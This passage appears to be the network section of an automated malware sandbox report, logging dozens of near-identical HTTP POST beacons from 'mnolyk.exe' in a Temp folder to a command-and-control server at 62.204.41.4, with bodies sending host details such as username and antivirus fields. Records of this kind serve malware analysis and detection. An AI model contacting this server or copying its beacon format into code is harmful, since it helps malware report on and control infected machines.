                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.647891998 CET703INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            515192.168.2.45021062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:49.826812983 CET703OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.892420053 CET704INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            516192.168.2.45021162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:50.075216055 CET704OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.142936945 CET705INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            517192.168.2.45021262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:50.310671091 CET705OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.375612020 CET706INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            518192.168.2.45021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:50.554965973 CET706OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.619915962 CET707INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            519192.168.2.45021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:50.800451040 CET707OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:50.864557981 CET708INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            52192.168.2.44974762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:39.514163017 CET241OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.576247931 CET241INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            520192.168.2.45021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:51.044011116 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.110352993 CET709INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            521192.168.2.45021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:51.285754919 CET709OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.350711107 CET710INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            522192.168.2.45021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:51.538233042 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.606420994 CET711INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            523192.168.2.45021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:51.779999971 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:51.845904112 CET712INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            524192.168.2.45021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:52.017412901 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.084542036 CET713INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            525192.168.2.45022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:52.269838095 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.334613085 CET714INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            526192.168.2.45022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:52.520097017 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.582335949 CET715INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            527192.168.2.45022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:52.771625042 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:52.834398985 CET716INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            528192.168.2.45022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:53.012602091 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.077357054 CET717INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            529192.168.2.45022462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:53.250127077 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.315500975 CET718INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            53192.168.2.44974862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:39.760373116 CET242OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.827455997 CET242INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            530192.168.2.45022562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:53.481401920 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.544372082 CET719INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            531192.168.2.45022662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:53.716249943 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:53.780318975 CET720INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            532192.168.2.45022762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:53.949662924 CET720OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.012635946 CET721INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            533192.168.2.45022862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:54.186331987 CET721OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
